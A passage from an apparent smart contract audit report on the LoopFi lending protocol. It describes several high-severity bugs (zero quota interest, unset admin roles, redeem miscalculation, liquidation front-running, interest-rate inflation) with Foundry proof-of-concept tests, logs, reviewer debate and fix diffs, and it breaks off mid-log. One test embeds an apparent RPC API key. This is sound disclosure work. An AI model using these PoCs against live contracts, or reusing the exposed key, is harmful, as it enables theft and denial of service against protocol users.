payments get made for the requested quota; allowing the malicious users access to risk-free leveraging on the maximum amount of quota they can get.
Koolex (judge) increased severity to High and commented:
@Bauchibred - can you please provide a PoC on how a user can request a huge quota on zero rate? Not necessarily with code. but a breakdown of the call flow. The above proof lacking this.
Bauchibred (warden) commented:
@Koolex, requesting a huge quota is by just taking up a borrow position against the collateral and whenever calculating the debt from the borrowed position or the revenue change, the methods shown in the report above and dropdown below from
are used.Call flow breakdown with code snippets
A user can request a borrow credit against the collateral token here we’d have the
to be non-zero which is what I mean by a huge quota. Now for each position there are two fees to be charged, one based on pool utilisation and another based on the quota fees fromPoolQuotaKeeperV3
and since the quota interest has been defaulted to zero before the next epoch as hinted in the report whenever paying back the protocol loses out on this interest, (i.e., the quota interest):function borrow(address borrower, address position, uint256 amount) external { int256 deltaDebt = toInt256(amount); modifyCollateralAndDebt({ owner: position, collateralizer: position, creditor: borrower, deltaCollateral: 0, deltaDebt: deltaDebt }); }
That’s to say when the user decides to repay, or their position is being interacted with the amount of debt is gotten by
, but no quota interest is being calculated for them cause while calculating the debt for the position we have0
interest rate being returned forcumulativeQuotaInterest
. As such, it’s not being considered for the overall accrued interest:function _calcDebt(Position memory position) internal view returns (DebtData memory cdd) { uint256 index = pool.baseInterestIndex(); cdd.debt = position.debt; cdd.cumulativeIndexNow = index; cdd.cumulativeIndexLastUpdate = position.cumulativeIndexLastUpdate; cdd.cumulativeQuotaIndexLU = position.cumulativeQuotaIndexLU; // Get cumulative quota interest (cdd.cumulativeQuotaInterest, cdd.cumulativeQuotaIndexNow) = _getQuotedTokensData(cdd); cdd.cumulativeQuotaInterest += position.cumulativeQuotaInterest; cdd.accruedInterest = CreditLogic.calcAccruedInterest(cdd.debt, cdd.cumulativeIndexLastUpdate, index); cdd.accruedInterest += cdd.cumulativeQuotaInterest; }
Note that the
that’s been used to define the overall accrued interest is gotten directly from:function _getQuotedTokensData( DebtData memory cdd ) internal view returns (uint128 outstandingQuotaInterest, uint192 cumulativeQuotaIndexNow) { cumulativeQuotaIndexNow = IPoolQuotaKeeperV3(poolQuotaKeeper()).cumulativeIndex(address(token)); uint128 outstandingInterestDelta = QuotasLogic.calcAccruedQuotaInterest( uint96(cdd.debt), cumulativeQuotaIndexNow, cdd.cumulativeQuotaIndexLU ); outstandingQuotaInterest = outstandingInterestDelta; // U:[CM-24] }
Which queries the Quota keeper to get the current index, that’s defined by the rate:
function cumulativeIndex(address token) public view override returns (uint192) { TokenQuotaParams storage tokenQuotaParams = totalQuotaParams[token]; (uint16 rate, uint192 tqCumulativeIndexLU, ) = _getTokenQuotaParamsOrRevert(tokenQuotaParams); return QuotasLogic.cumulativeIndexSince(tqCumulativeIndexLU, rate, lastQuotaRateUpdate); }
function _getTokenQuotaParamsOrRevert( TokenQuotaParams storage tokenQuotaParams ) internal view returns (uint16 rate, uint192 cumulativeIndexLU, uint16 quotaIncreaseFee) { // rate = tokenQuotaParams.rate; // cumulativeIndexLU = tokenQuotaParams.cumulativeIndexLU; // quotaIncreaseFee = tokenQuotaParams.quotaIncreaseFee; assembly { let data := sload(tokenQuotaParams.slot) rate := and(data, 0xFFFF)//@audit rate here cumulativeIndexLU := and(shr(16, data), 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF) quotaIncreaseFee := shr(208, data) } if (cumulativeIndexLU == 0) { revert TokenIsNotQuotedException(); // U:[PQK-14] } }
Also in the same light revenue change for quota would always be
during modification of collateral/debt or even liquidation that’s queried in the vault by the_calcQuotaRevenueChange()
helper function:function _calcQuotaRevenueChange(int256 deltaDebt) internal view returns (int256 quotaRevenueChange) { uint16 rate = IPoolQuotaKeeperV3(poolQuotaKeeper()).getQuotaRate(address(token)); return QuotasLogic.calcQuotaRevenueChange(rate, deltaDebt); }
/// @dev Computes the pool quota revenue change given the current rate and the quota change function calcQuotaRevenueChange(uint16 rate, int256 change) internal pure returns (int256) { return change * int256(uint256(rate)) / int16(PERCENTAGE_FACTOR); }
Edit: Took consideration of @0xAlix2’s comment below and explicitly attached the fact that the interest which Loopfi is losing out on is their “quota interest” and not the whole debt’s interest as they assume. To note, why we are talking about debt in this discussion is cause I needed to showcase where the huge quota is requested since asked by the judge. Do check the diffs for the edit. In my opinion, this fact can also be seen clearly even from the title of the report that the user is getting an “interest free quota” and not an interest free debt.
NB: This same issue was reported and fixed in the original Gearbox protocol, see 7.3 which this is a fork of. Albeit in that instance it was assessed as a Medium, I submitted as high cause per C4 standards and as hinted here already, it doesn’t need any hypothetical path to be actualised.
There’s some confusion here, having 0
doesn’t mean no interest. Let me explain, Loopfi has 2 separate interest rates, there’s the quota interest and the default credit interest, as seen the credit interest calculation has nothing to do with the Quota’s logic, you can confirm this from Loopfi’s docs.I also had this fuzzing test that confirms this, that you can add in
:function test_someFuzzzz() public { CDPVault vault = createCDPVault(token, 150 ether, 0, 1.25 ether, 1.0 ether, 0); createGaugeAndSetGauge(address(vault)); address position = address(new PositionOwner(vault)); uint256 depositAmount = 100 ether; uint256 borrowAmount = 80 ether; token.mint(address(this), depositAmount); token.approve(address(vault), depositAmount); underlyingToken.mint(address(this), depositAmount); underlyingToken.approve(address(vault), depositAmount); uint256 initialInterestRate = vault.pool().baseInterestRate(); vault.deposit(position, depositAmount); vault.borrow(address(this), position, borrowAmount); vm.warp(block.timestamp + 30 days); console.log("repay"); vault.repay(address(this), position, vault.virtualDebt(position)); }
function _calcDebt(Position memory position) internal view returns (DebtData memory cdd) { uint256 index = pool.baseInterestIndex(); cdd.debt = position.debt; cdd.cumulativeIndexNow = index; cdd.cumulativeIndexLastUpdate = position.cumulativeIndexLastUpdate; cdd.cumulativeQuotaIndexLU = position.cumulativeQuotaIndexLU; // Get cumulative quota interest (cdd.cumulativeQuotaInterest, cdd.cumulativeQuotaIndexNow) = _getQuotedTokensData(cdd); cdd.cumulativeQuotaInterest += position.cumulativeQuotaInterest; + console.log("cdd.cumulativeQuotaInterest", cdd.cumulativeQuotaInterest); cdd.accruedInterest = CreditLogic.calcAccruedInterest(cdd.debt, cdd.cumulativeIndexLastUpdate, index); + console.log("cdd.accruedInterest", cdd.accruedInterest); cdd.accruedInterest += cdd.cumulativeQuotaInterest; }
Logs: cdd.cumulativeQuotaInterest 0 cdd.accruedInterest 0 cdd.cumulativeQuotaInterest 0 cdd.accruedInterest 0 cdd.cumulativeQuotaInterest 0 cdd.accruedInterest 0 repay cdd.cumulativeQuotaInterest 6575342465753424 cdd.accruedInterest 657658017727639000 cdd.cumulativeQuotaInterest 6575342465753424 cdd.accruedInterest 657658017727639000
As seen the quota interest did accumulate.
Assuming the test is wrong (which I don’t think so), and the quota interest is 0, we can manually manipulate the quota index (so that it matches the initially set index here) so that the resulting quota interest is 0:
function _getQuotedTokensData( DebtData memory cdd ) internal view returns (uint128 outstandingQuotaInterest, uint192 cumulativeQuotaIndexNow) { - cumulativeQuotaIndexNow = IPoolQuotaKeeperV3(poolQuotaKeeper()).cumulativeIndex(address(token)); + cumulativeQuotaIndexNow = 1; uint128 outstandingInterestDelta = QuotasLogic.calcAccruedQuotaInterest( uint96(cdd.debt), cumulativeQuotaIndexNow, cdd.cumulativeQuotaIndexLU ); outstandingQuotaInterest = outstandingInterestDelta; // U:[CM-24] }
Logs: cdd.cumulativeQuotaInterest 0 cdd.accruedInterest 0 cdd.cumulativeQuotaInterest 0 cdd.accruedInterest 0 cdd.cumulativeQuotaInterest 0 cdd.accruedInterest 0 repay cdd.cumulativeQuotaInterest 0 cdd.accruedInterest 657658017727639000 cdd.cumulativeQuotaInterest 0 cdd.accruedInterest 657658017727639000
We can see that the Quota interest is indeed 0, but the user is casually paying the other “credit” interest.
As a result, there’s always some interest being paid to the protocol.
Edit: My response mainly refuted the following, showing that interest will always be paid regardless of the Quota.
an attacker can request a huge quota even up to the configured limit without having to pay any interest to the protocol
Assuming that the Quotas interest will always be 0 (I still doubt it, as the above test shows this, unless I’m missing something), for this to be high, assets need to be “stolen/lost/compromised”, how is this happening here?
@Bauchibred - I’m already aware that the issue was already reported elsewhere; in fact, if you search the in the codebase (in the lib) you would find the fixed version. Somehow, the devs overlooked it.
quotaChange = (rate == 0) ? int96(0) : QuotasLogic.calcActualQuotaChange(totalQuoted, limit, quotaChange); // U:[PQK-15]
To summarize the impact, quota interest won’t be paid during the period where
rate = 0
, max time of this is one epoch. In normal cases, I would consider this as a Medium. However, I have re-assessed it above as High for the following reasons:
- It can happen on each new token added.
- Can be done at scale (i.e., many users) or one user with a huge amount, as a result loss of interest for LPs who voted for it.
- It undermines the intended functionality from voting (CA vs LP) on quota rate, if there is any.
[H-04] AuraVault
inherits AccessControl
BUT does not call the _setupRole()
function in it’s constructor to set the initial roles. This leads to a complete DOS of the important claim function rendering the contract unable to claim rewards
Submitted by Spearmint, also found by karsar, 0xBugSlayer, lian886, Kaysoft, zhaojie, 0xpiken, inh3l, EPSec, and pkqs90
The AuraVault
contract inherits OpenZeppelin’s AccessControl
contract to implement role-based access control. The issue is that the AuraVault
contract does not call the _setupRole()
function in it’s constructor to set the DEFAULT_ADMIN_ROLE
Since this is not done in the constructor it is impossible to call grantRole()
since it has the onlyRole(getRoleAdmin(role))
modifier. It is important to note that no roles have been set; therefore, there is no address that can call this function to set roles. Therefore, it is impossible to set the VAULT_ADMIN_ROLE
The minor impact is that the setParameter()
function can never be called to change the feed
or auraPriceOracle
because it has the onlyRole(VAULT_CONFIG_ROLE)
modifier. The critical impact is because setVaultConfig()
function can never be called to initialize the vaultConfig
The uninitialized vaultConfig
struct will default all the variables to 0:
struct VaultConfig {
/// @notice The incentive sent to claimer (in bps)
uint32 claimerIncentive;
/// @notice The incentive sent to lockers (in bps)
uint32 lockerIncentive;
/// @notice The locker rewards distributor
address lockerRewards;
/// @notice CDPVault configuration
VaultConfig public vaultConfig;
The issue arises specifically from the lockerRewards
variable being the 0 address. When a user calls claim()
to claim accumulated rewards by depositing WETH instead, the following line will cause the call to always revert since it attempts to send 0 BAL to the 0 address.
function claim(uint256[] memory amounts, uint256 maxAmountIn) external returns (uint256 amountIn) {
// Claim rewards from Aura reward pool
// Distribute BAL rewards
IERC20(BAL).safeTransfer(_config.lockerRewards, (amounts[0] * _config.lockerIncentive) / INCENTIVE_BASIS);
The balancer token will revert if the recipient is the 0 address due to the following check in it’s _transfer
function (BAL token on etherscan).
function _transfer(address sender, address recipient, uint256 amount) internal virtual {
require(sender != address(0), "ERC20: transfer from the zero address");
require(recipient != address(0), "ERC20: transfer to the zero address");
_beforeTokenTransfer(sender, recipient, amount);
_balances[sender] = _balances[sender].sub(amount, "ERC20: transfer amount exceeds balance");
_balances[recipient] = _balances[recipient].add(amount);
emit Transfer(sender, recipient, amount);
Proof of Concept
Here is a fully coded POC with a mainnet fork:
- Add the following
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;
import {IERC20} from "@openzeppelin/contracts/token/ERC20/IERC20.sol";
import {ERC20} from "@openzeppelin/contracts/token/ERC20/ERC20.sol";
interface IPool {
function asset() external view returns (address);
function balanceOf(address) external view returns (uint256);
function deposit(uint256, address) external returns (uint256);
function withdraw(uint256, bool) external;
function withdraw(uint256, address, address) external;
function redeem(uint256 shares, address receiver, address owner) external returns (uint256);
function getReward() external returns (bool);
function extraRewardsLength() external view returns (uint256);
function rewardToken() external view returns (address);
function earned(address account) external view returns (uint256);
contract MockAuraPool is IPool, ERC20 {
IERC20 public immutable _asset;
IERC20 public immutable _rewardToken;
mapping(address => uint256) public userRewards;
constructor(address asset_, address rewardToken_) ERC20("Mock Aura Pool", "mAP") {
_asset = IERC20(asset_);
_rewardToken = IERC20(rewardToken_);
function asset() external view override returns (address) {
return address(_asset);
function balanceOf(address account) public view override(IPool, ERC20) returns (uint256) {
return super.balanceOf(account);
function deposit(uint256 amount, address receiver) external override returns (uint256) {
_asset.transferFrom(msg.sender, address(this), amount);
_mint(receiver, amount);
return amount;
function withdraw(uint256 amount, bool) external override {
_burn(msg.sender, amount);
_asset.transfer(msg.sender, amount);
function withdraw(uint256 amount, address receiver, address owner) external override {
if (msg.sender != owner) {
_spendAllowance(owner, msg.sender, amount);
_burn(owner, amount);
_asset.transfer(receiver, amount);
function redeem(uint256 shares, address receiver, address owner) external override returns (uint256) {
if (msg.sender != owner) {
_spendAllowance(owner, msg.sender, shares);
_burn(owner, shares);
uint256 amount = shares; // 1:1 ratio for simplicity
_asset.transfer(receiver, amount);
return amount;
function getReward() external override returns (bool) {
uint256 reward = userRewards[msg.sender];
if (reward > 0) {
userRewards[msg.sender] = 0;
_rewardToken.transfer(msg.sender, reward);
return true;
function extraRewardsLength() external pure override returns (uint256) {
return 0; // No extra rewards for simplicity
function rewardToken() external view override returns (address) {
return address(_rewardToken);
function earned(address account) external view override returns (uint256) {
return userRewards[account];
// Helper function to simulate rewards
function setReward(address account, uint256 amount) external {
userRewards[account] = amount;
- Add the following
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.19;
import "../interfaces/IOracle.sol";
contract MockOracle is IOracle {
struct OracleAverageQuery {
Variable variable;
uint256 secs;
uint256 ago;
mapping(address token => uint256 spot) private _spot;
mapping(address => uint256) private prices;
function updateSpot(address token, uint256 price) external {
prices[token] = price;
function spot(address token) external view returns (uint256) {
return prices[token];
function getStatus(address /*token*/) public pure returns (bool) {
return true;
function getTimeWeightedAverage(OracleAverageQuery[] memory queries)
returns (uint256[] memory results)
results = new uint256[](queries.length);
for (uint256 i = 0; i < queries.length; i++) {
// We're assuming that the Variable enum value corresponds to a token address
// This might need adjustment based on how it's actually used in your system
address token = address(uint160(uint256(queries[i].variable)));
results[i] = prices[token];
return results;
- Add the following
and run it with the following command:
forge test --mt test__POC__ClaimFunctionAlwaysReverts -vvvvv
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;
import {Test} from "forge-std/Test.sol";
import {console} from "forge-std/console.sol";
import {AuraVault} from "../../vendor/AuraVault.sol";
import {IERC20} from "@openzeppelin/contracts/token/ERC20/IERC20.sol";
import {MockOracle} from "../MockOracle.sol";
import {MockAuraPool} from "../MockAuraPool.sol";
contract AuraVaultTest is Test {
AuraVault public auraVault;
MockAuraPool public mockAuraPool;
IERC20 public weth;
IERC20 public bal;
IERC20 public aura;
MockOracle public mockFeed;
MockOracle public mockAuraPriceOracle;
uint32 public constant MAX_CLAIMER_INCENTIVE = 1000; // 10%
uint32 public constant MAX_LOCKER_INCENTIVE = 2000; // 20%
uint256 mainnetFork;
// Mainnet addresses
address constant WETH_ADDRESS = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2;
address constant BAL_ADDRESS = 0xba100000625a3754423978a60c9317c58a424e3D;
address constant AURA_ADDRESS = 0xC0c293ce456fF0ED870ADd98a0828Dd4d2903DBF;
address public USER = address(879);
function setUp() public {
mainnetFork = vm.createFork("<https://eth-mainnet.g.alchemy.com/v2/QF9A5wFdl6h_Im_XTqd7A8cbiyHc_VUu>");
// Use real token contracts
// Deploy mock contracts
mockAuraPool = new MockAuraPool(WETH_ADDRESS, BAL_ADDRESS);
mockFeed = new MockOracle();
mockAuraPriceOracle = new MockOracle();
// Deploy AuraVault
auraVault = new AuraVault(
"Aura Vault WETH",
// Set up mock oracle prices
mockFeed.updateSpot(WETH_ADDRESS, 2000e18); // WETH at $2000
mockFeed.updateSpot(BAL_ADDRESS, 10e18); // BAL at $10
mockAuraPriceOracle.updateSpot(AURA_ADDRESS, 5e18); // AURA at $5
// Give some WETH to the test contract and USER
deal(WETH_ADDRESS, address(this), 100 ether);
deal(WETH_ADDRESS, USER, 100 ether);
// Approve vault to spend WETH
weth.approve(address(auraVault), type(uint256).max);
weth.approve(address(auraVault), type(uint256).max);
function test__POC__ClaimFunctionAlwaysReverts() public {
// Setup rewards
uint256[] memory rewardAmounts = new uint256[](2);
rewardAmounts[0] = 10e18; // 10 BAL
rewardAmounts[1] = 5e18; // 5 AURA
deal(BAL_ADDRESS, address(mockAuraPool), rewardAmounts[0]);
deal(AURA_ADDRESS, address(mockAuraPool), rewardAmounts[1]);
mockAuraPool.setReward(address(auraVault), rewardAmounts[0]);
// Calculate expected WETH amount for claim
uint256 expectedWethAmount = (rewardAmounts[0] * 10e18 + rewardAmounts[1] * 5e18) / 2000e18;
// User attempts to claim the rewards but it reverts
auraVault.claim(rewardAmounts, expectedWethAmount) ;
Console output:
│ ├─ [6168] 0xba100000625a3754423978a60c9317c58a424e3D::transfer(0x0000000000000000000000000000000000000000, 0)
│ │ └─ ← [Revert] revert: ERC20: transfer to the zero address
│ └─ ← [Revert] revert: ERC20: transfer to the zero address
└─ ← [Revert] revert: ERC20: transfer to the zero address
Suite result: FAILED. 0 passed; 1 failed; 0 skipped; finished in 13.81s (9.23s CPU time)
Ran 1 test suite in 15.09s (13.81s CPU time): 0 tests passed, 1 failed, 0 skipped (1 total tests)
Failing tests:
Encountered 1 failing test in src/test/integration/AuraVault.t.sol:AuraVaultTest
[FAIL. Reason: revert: ERC20: transfer to the zero address] test__POC__ClaimFunctionAlwaysReverts() (gas: 637701)
Encountered a total of 1 failing tests, 0 tests succeeded.
The minor impact is that the setParameter()
function can never be called to change the feed
or auraPriceOracle
because it has the onlyRole(VAULT_CONFIG_ROLE)
modifier. The critical impact is because setVaultConfig()
function can never be called to initialize the vaultConfig
The uninitialized vaultConfig
struct will default all the variables to 0, causing the claim
function to revert permanently. Since the claim()
function always reverts it will be impossible to claim the rewards; therefore, there is no incentive to be deposit in the pool.
Recommended Mitigation Steps
Modify the AuraVault
constructor as follows:
address rewardPool_,
address asset_,
address feed_,
address auraPriceOracle_,
uint32 maxClaimerIncentive_,
uint32 maxLockerIncentive_,
string memory tokenName_,
string memory tokenSymbol_,
+ address vaultAdminRole,
+ address vaultConfigRole
) ERC4626(IERC20(asset_)) ERC20(tokenName_, tokenSymbol_) {
rewardPool = rewardPool_;
feed = feed_;
auraPriceOracle = auraPriceOracle_;
maxClaimerIncentive = maxClaimerIncentive_;
maxLockerIncentive = maxLockerIncentive_;
+ _setupRole(VAULT_ADMIN_ROLE, vaultAdminRole);
+ _setupRole(VAULT_CONFIG_ROLE, vaultConfigRole);
Assessed type
Access Control
amarcu (LoopFi) acknowledged and commented:
Acknowledged but we will remove and not use the
[H-05] There is a calculation error in AuraVault::redeem()
Submitted by lian886, also found by novamanbg
The amount of funds that users can withdraw decreases, leading to a loss of funds for users.
Proof of Concept
function redeem(
uint256 shares,
address receiver,
address owner
) public virtual override(IERC4626, ERC4626) returns (uint256) {
require(shares <= maxRedeem(owner), "ERC4626: redeem more than max");
// Redeem assets from Aura reward pool and send to "receiver"
@>> uint256 assets = IPool(rewardPool).redeem(shares, address(this), address(this));
_withdraw(_msgSender(), receiver, owner, assets, shares);
return assets;
We can see that AuraVault::redeem()
confuses AuraVault’s shares with rewardPool
’s shares. AuraVault’s shares need to be converted into AuraVault’s underlying tokens (assets) before they can be withdrawn. This is particularly problematic because, as we know from the rewardPool
contract address, rewardPool::redeem()
functions the same way as rewardPool::withdraw()
function redeem(
uint256 shares,
address receiver,
address owner
) external virtual override returns (uint256) {
return withdraw(shares, receiver, owner);
Moreover, in the rewardPool
, the ratio of share to asset is always 1:1.
Scenario Example:
Let’s assume that in AuraVault
, the ratio of share to asset is always 1:2. In this case, if a user withdraws 1 share, they will ultimately receive only 1 asset; whereas, they should have received 2 assets.
Recommended Mitigation Steps
function redeem(
uint256 shares,
address receiver,
address owner
) public virtual override(IERC4626, ERC4626) returns (uint256) {
require(shares <= maxRedeem(owner), "ERC4626: redeem more than max");
+ uint256 assets = previewRedeem(shares);
// Redeem assets from Aura reward pool and send to "receiver"
- uint256 assets = IPool(rewardPool).redeem(shares, address(this), address(this));
+ assets = IPool(rewardPool).redeem(assets, address(this), address(this));
_withdraw(_msgSender(), receiver, owner, assets, shares);
return assets;
Assessed type
amarcu (LoopFi) acknowledged and commented:
Acknowledged but we will remove and not use the
[H-06] Malicious borrower can evade full liquidation in CDPVault::liquidatePosition
by repaying small amounts of debt
Submitted by 0xbepresent, also found by Spearmint and Evo
In the CDPVault::liquidatePosition
function, a liquidator can repay the total debt of a position to liquidate it, this can be achieved by calling the CDPVault::virtualDebt
function to obtain the total debt and then call CDPVault::liquidatePosition
. However, a malicious borrower can front-run this liquidation transaction by repaying a small amount (e.g., 1 wei) of the debt. This action causes the debt to be slightly less than the amount the liquidator intends to repay. Consequently, the subtraction operation in CDPVault#L713
will underflow, leading to a revert in the transaction. This will allow borrowers to evade total debt liquidation.
Proof of Concept
Consider the next scenario:
- Assume the initial debt is
80 ether
. The position is liquidatable. - Liquidator prepares to repay the full debt
80 ether
to liquidate the position viaCDPVault::liquidatePosition
. Liquidator gets the full debt usingCDPVault::virtualDebt
function. - Malicious borrower front-runs the transaction and repays
1 wei
, the debt is now80 ether - 1 wei
. - Liquidator’s transaction is executed but it attempts to repay
80 ether
, causing an underflow when thenewDebt
is calculatedCDPVault#L713
as(80 ether - 1 wei) - 80 ether
File: CDPVault.sol
652: function calcDecrease(
653: uint256 amount,
654: uint256 debt,
655: uint256 cumulativeIndexNow,
656: uint256 cumulativeIndexLastUpdate,
657: uint128 cumulativeQuotaInterest
658: )
659: internal
660: pure
661: returns (uint256 newDebt, uint256 newCumulativeIndex, uint256 profit, uint128 newCumulativeQuotaInterest)
662: {
663: uint256 amountToRepay = amount;
713:>>> newDebt = debt - amountToRepay; // underflow
714: }
The next test demonstrates how the malicious borrower can evade full liquidation by repaying small amounts of the debt.
// File: CDPVault.t.sol
function test_liquidate_fullliquidation_panicerror() public {
CDPVault vault = createCDPVault(token, 150 ether, 0, 1.25 ether, 1 ether, 0.95 ether);
// create position
_modifyCollateralAndDebt(vault, 110 ether, 80 ether);
// position is liquidatable
_updateSpot(0.80 ether);
// 1. Liquidator calculates the full debt in order to call `CDPVault::liquidatePosition`.
address position = address(this);
uint256 liquidatorRepayAmount = virtualDebt(vault, position);
address liquidator = address(0xb0b);
createCredit(liquidator, liquidatorRepayAmount);
// 2. Malicious borrower frontrun liquidator and repays 1 wei
mockWETH.approve(address(vault), 1);
vault.modifyCollateralAndDebt(address(this), address(this), address(this), 0, -toInt256(1));
// 3. Liquidator tx is executed but it will be reverted by `arithmeticError`
mockWETH.approve(address(vault), liquidatorRepayAmount);
vault.liquidatePosition(position, liquidatorRepayAmount);
Recommended Mitigation Steps
Implement a validation to prevent repayment if the position remains liquidable after increasing the repayment amount.
Assessed type
0xtj24 (LoopFi) acknowledged and commented:
All liquidators would have to take into account a possible repayment from other liquidators. He could split into 2 repayments for example.
already checks if an amount is too high for repayment. Also, in case of 1 wei, it is not economically feasible since it would just be better for the borrower to repay instead of spending gas for multiple txs to avoid liquidation, since it would have to constantly frontrunning it.
I see two issues here:
- A malicious actor can DoS liquidators, not only one. Since liquidators race and eventually one will win. In this case, the malicious actor.
- DoS could naturally happen if more than one liquidator race for liquidation and the sum of the amounts isn’t equal to the highest possible amount.
Please take into consideration, if the loan is too big, the costs of gas is relatively too small.
[H-07] Malicious borrower cycle exploits to inflate interest rates
Submitted by Evo
The current implementation allows a malicious actor to artificially inflate interest rates for all borrowers in the system through rapid borrow-and-repay cycles. This exploit can lead to:
- Increased costs for legitimate borrowers who may face higher interest rates than expected.
- Potential forced liquidations of other borrowers if interest rates rise rapidly enough to push their positions into unsafe territory.
- Unfair advantage for the attacker if they are also a lender in the system, as they could increase returns on their deposits.
This vulnerability undermines the fairness and stability of the lending platform, potentially leading to loss of funds for users.
Proof of Concept
The following test demonstrates the attack by comparing interest accrual with and without the borrow-repay cycles, please add this test function to CDPVault.t.sol
test file:
function test_borrow_repay_cycles_with_attack() public {
function test_borrow_repay_cycles_without_attack() public {
// A cycle borrower can increase the interest rate on other borrowers. by borrow and repay.
function compare_interest_accrual_with_borrow_repay_cycles(bool attack) internal {
console.log(attack?"Cycle borrower is attacking":"Cycle borrower is NOT attacking");
CDPVault vault = createCDPVault(token, 1000 ether, 0, 1.25 ether, 1.0 ether, 0);
// Setup two borrowers
address normalBorrower = address(0x1);
address cycleBorrower = address(0x2);
address normalBorrower2 = address(0x3);
// Deposit more collateral to ensure safe ratios
uint256 collateralAmount = 200 ether;
token.mint(normalBorrower, collateralAmount);
token.approve(address(vault), collateralAmount);
vault.deposit(normalBorrower, collateralAmount);
token.mint(normalBorrower2, collateralAmount);
token.approve(address(vault), collateralAmount);
vault.deposit(normalBorrower2, collateralAmount);
token.mint(cycleBorrower, collateralAmount);
console.log("Cycle borrower Balance Before:", token.balanceOf(cycleBorrower));
token.approve(address(vault), collateralAmount);
vault.deposit(cycleBorrower, collateralAmount);
// Both borrowers take out initial loans
uint256 borrowAmount = 50 ether;
vault.modifyCollateralAndDebt(normalBorrower, normalBorrower, normalBorrower, 0, int256(borrowAmount));
vault.modifyCollateralAndDebt(normalBorrower2, normalBorrower2, normalBorrower2, 0, int256(borrowAmount));
// Record initial state
uint256 initialDebtNormal = vault.virtualDebt(normalBorrower);
uint256 initialDebtNormal2 = vault.virtualDebt(normalBorrower2);
uint256 initialDebtCycle = vault.virtualDebt(cycleBorrower);
console.log("Initial state:");
// Simulate passage of time and borrow-repay cycles
uint256 cycles = 10;
uint256 timeBetweenCycles = 1 hours;
// Mint a large amount of WETH to this contract to cover all potential debts
mockWETH.mint(address(this), 1000 ether);
for (uint256 i = 0; i < cycles; i++) {
vault.modifyCollateralAndDebt(cycleBorrower, cycleBorrower, cycleBorrower, 0, int256(borrowAmount));
// Repay all debt
uint256 currentDebt = vault.virtualDebt(cycleBorrower);
if (currentDebt > 0) {
mockWETH.transfer(cycleBorrower, currentDebt);
mockWETH.approve(address(vault), currentDebt);
vault.modifyCollateralAndDebt(cycleBorrower, cycleBorrower, cycleBorrower, 0, -int256(currentDebt));
console.log("Borrow and repay Cycle: #", i+1);
// Advance time
vm.warp(block.timestamp + timeBetweenCycles);
vault.withdraw(cycleBorrower, collateralAmount);
// Check final debts
uint256 finalDebtNormal = vault.virtualDebt(normalBorrower);
uint256 finalDebtNormal2 = vault.virtualDebt(normalBorrower2);
// Calculate accrued interest
console.log("Debts ======");
console.log("initialDebtNormal:", initialDebtNormal);
console.log("finalDebtNormal:", finalDebtNormal);
console.log("initialDebtNormal2:", initialDebtNormal2);
console.log("finalDebtNormal2:", finalDebtNormal2);
uint256 accruedInterestNormal = finalDebtNormal - initialDebtNormal;
uint256 accruedInterestNormal2 = finalDebtNormal2 - initialDebtNormal2;
// Calculate accrued interest
console.log("\n Accrued interest ======");
console.log("Normal borrower initial debt:", initialDebtNormal);
console.log("Normal borrower final debt:", finalDebtNormal);
console.log("Normal borrower accrued interest:", accruedInterestNormal);
console.log("Normal borrower 2 initial debt:", initialDebtNormal2);
console.log("Normal borrower 2 final debt:", finalDebtNormal2);
console.log("Normal borrower 2 accrued interest:", accruedInterestNormal2);
function logBalance(address addr) internal view {
console.log("Cycle borrower Balance After:", token.balanceOf(addr));
function logPoolState(CDPVault vault) internal view {
address poolAddress = address(vault.pool());
console.log(" Total Debt:", vault.totalDebt());
console.log(" Expected Liquidity:", IPoolV3(poolAddress).expectedLiquidity());
console.log(" Available Liquidity:", IPoolV3(poolAddress).availableLiquidity());
console.log(" Utilization:", calculateUtilization(
console.log(" Base Interest Rate:", IPoolV3(poolAddress).baseInterestRate());
function calculateUtilization(uint256 expectedLiquidity, uint256 availableLiquidity) internal pure returns (uint256) {
if (expectedLiquidity == 0) return 0;
return ((expectedLiquidity - availableLiquidity) * 10000) / expectedLiquidity;
Results from the test output:
With attack:
- Normal borrower accrued interest:
- Base Interest Rate after cycles:
- Normal borrower accrued interest:
Without attack:
- Normal borrower accrued interest:
- Base Interest Rate after cycles:
- Normal borrower accrued interest:
The attack results in higher accrued interest for normal borrowers and an increased base interest rate, despite the total debt remaining the same.
The output:
[PASS] test_borrow_repay_cycles_with_attack() (gas: 5103632)
Cycle borrower is attacking
Cycle borrower Balance Before: 200000000000000000000
Initial state:
Total Debt: 100000000000000000000
Expected Liquidity: 1000000000000000000000000
Available Liquidity: 999900000000000000000000
Utilization: 1
Base Interest Rate: 100023529411764705882352941
Borrow and repay Cycle: # 1
Borrow and repay Cycle: # 2
Borrow and repay Cycle: # 3
Borrow and repay Cycle: # 4
Borrow and repay Cycle: # 5
Borrow and repay Cycle: # 6
Borrow and repay Cycle: # 7
Borrow and repay Cycle: # 8
Borrow and repay Cycle: # 9
Borrow and repay Cycle: # 10
Debts ======
initialDebtNormal: 50000000000000000000
finalDebtNormal: 50005766476609207981
initialDebtNormal2: 50000000000000000000
finalDebtNormal2: 50005766476609207981
Accrued interest ======
Normal borrower initial debt: 50000000000000000000
Normal borrower final debt: 50005766476609207981
Normal borrower accrued interest: 5766476609207981
Normal borrower 2 initial debt: 50000000000000000000
Normal borrower 2 final debt: 50005766476609207981
Normal borrower 2 accrued interest: 5766476609207981
Total Debt: 100000000000000000000
Expected Liquidity: 1000000011532366510584090
Available Liquidity: 999900000000000000000000
Utilization: 1
Base Interest Rate: 100023531853668664470588235
Cycle borrower Balance After: 200000000000000000000
[PASS] test_borrow_repay_cycles_without_attack() (gas: 4077140)
Cycle borrower is NOT attacking
Cycle borrower Balance Before: 200000000000000000000
Initial state:
Total Debt: 100000000000000000000
Expected Liquidity: 1000000000000000000000000
Available Liquidity: 999900000000000000000000
Utilization: 1
Base Interest Rate: 100023529411764705882352941
Debts ======
initialDebtNormal: 50000000000000000000
finalDebtNormal: 50005766183185603008
initialDebtNormal2: 50000000000000000000
finalDebtNormal2: 50005766183185603008
Accrued interest ======
Normal borrower initial debt: 50000000000000000000
Normal borrower final debt: 50005766183185603008
Normal borrower accrued interest: 5766183185603008
Normal borrower 2 initial debt: 50000000000000000000
Normal borrower 2 final debt: 50005766183185603008
